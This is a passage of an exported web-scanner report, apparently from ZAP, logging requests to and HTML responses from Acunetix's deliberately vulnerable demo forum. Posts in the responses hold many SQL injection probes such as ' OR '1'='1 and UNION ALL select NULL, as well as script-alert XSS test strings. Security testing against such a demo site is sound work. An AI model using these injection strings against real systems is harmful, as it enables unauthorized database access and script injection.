class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>) UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>') UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>") UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> ASC -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:13:44 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>o3lppoLN</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:05:24 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Call me maybe<script>alert('Beautiful in white)</script> - 202.187.185.168</div><div class='posttext'>HI Maybe<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:06:11 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Call me maybe<script>alert('Beautiful in white')</script> - 202.187.185.168</div><div class='posttext'>HI Maybe<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:51:58 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 <script>alert('Hello')</script> - 180.75.245.68</div><div class='posttext'>HELLO<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>hanxuan</b> on 3/13/2022 2:43:15 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>hi - 180.75.236.90</div><div class='posttext'>http://example.com/han.js<br />document.write("I'm coming");</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 5979 |
| Response Body - size: 5,979 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:12:27 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script><br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:12:55 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 - 180.74.64.218</div><div class='posttext'>Message 1<script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:08 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>111 - 180.74.64.218</div><div class='posttext'>Message 1<script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:31 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>123 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:41 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>123 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:51 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1<script>alert('Hello')</script> - 180.74.64.218</div><div class='posttext'>1232</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=10 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4130 |
| Response Body - size: 4,130 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%" -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=11 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=12 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4135 |
| Response Body - size: 4,135 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=13 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4139 |
| Response Body - size: 4,139 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a 